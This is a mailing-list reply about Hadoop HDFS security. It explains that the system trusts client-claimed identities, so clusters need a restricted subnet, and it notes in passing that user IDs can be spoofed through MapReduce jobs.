hmar...@umbc.edu wrote:
Steve,
Security through obscurity is always a good practice from a development
standpoint and one of the reasons why tricking you out is an easy task.
:)
My most recent presentation on HDFS clusters is now online, notice how it
doesn't gloss over the security:
http://www.slideshare.net/steve_l/hdfs-issues
Please, keep hiding relevant details from people in order to keep everyone
smiling.
HDFS is as secure as NFS: you are trusted to be who you say you are.
Which means that you have to run it on a secured subnet -access
restricted to trusted hosts and/or one two front end servers or accept
that your dataset is readable and writeable by anyone on the network.
There is user identification going in; it is currently at the level
where it will stop someone accidentally deleting the entire filesystem
if they lack the rights. Which has been known to happen.
If the team looking after the cluster demand separate SSH keys/login for
every machine then not only are they making their operations costs high,
once you have got the HDFS cluster and MR engine live, it's moot. You
can push out work to the JobTracker, which then runs it on the machines,
under whatever userid the TaskTrackers are running on. Now, 0.20+ will
run it under the identity of the user who claimed to be submitting the
job, but without that, your MR Jobs get the access rights to the
filesystem of the user that is running the TT, but it's fairly
straightforward to create a modified hadoop client JAR that doesn't call
whoami to get the userid, and instead spoofs to be anyone. Which means
that even if you lock down the filesystem -no out of datacentre access-,
if I can run my java code as MR jobs in your cluster, I can have
unrestricted access to the filesystem by way of the task tracker server.
But Hal, if you are running Ant for your build I'm running my code on
your machines anyway, so you had better be glad that I'm not malicious.
-Steve